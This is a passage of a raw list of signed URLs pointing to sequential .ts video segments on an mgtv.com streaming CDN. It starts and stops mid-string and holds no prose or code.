caZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/12968A8FA948DA6F828F01B1B42B1690_620080_630080_2588_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FB2EF1C71C843E6ADF24E29B3553D14E_630080_640080_1239_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8EE3A4A0EA0557CDF71A62AF96659A26_640080_650080_862_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4A5DE40514DC4F9EBEEE0C3FCA5AEE9F_650080_660080_1467_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/14BCEC6B59C772B7921E59D83CBCADB2_660080_670080_1018_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/ADAD8F30A10FEFFA0DE165ECA74F985A_670080_680080_1554_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8838B2A3490536B41908C70F68A2B00B_680080_690080_1146_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D4C1E15399EDF167D0DE03C4CB4E8674_690080_700080_783_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0A0BAC7494970E9F7A276928F150752C_700080_710080_1197_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FD2FC349430796DDAD4BA24FB09C53AA_710080_720080_1086_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/A4B39FF7EE06E5F83F4E4CCD8243854B_720080_730080_946_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E5941EC8EB99122FF2A906E67CDEFCDF_730080_740080_1226_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/57808D989E8A303086993E5B48A7758D_740080_750080_1556_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E28DF7E3120E708B72AC406657F3BB02_750080_760080_1418_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/DBC4ADB670A949211D71F9C9B7678D16_760080_770080_1006_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7CA08B0A45E7F580255715E19DA8877C_770080_780080_1019_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CA63F37FFB93B4FC2A12DC937444A7D2_780080_790080_1149_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0E9ED250AB8F1F1E7B9A5F5EA9D23501_790080_800080_980_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7BB2F346228180CD56353B8F274A0C1C_800080_810080_1126_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/17E42B20AE545E75B5E055366F6C7603_810080_820080_660_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D7A0363FF7BC329D0026EB121C0765DA_820080_830080_1112_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxW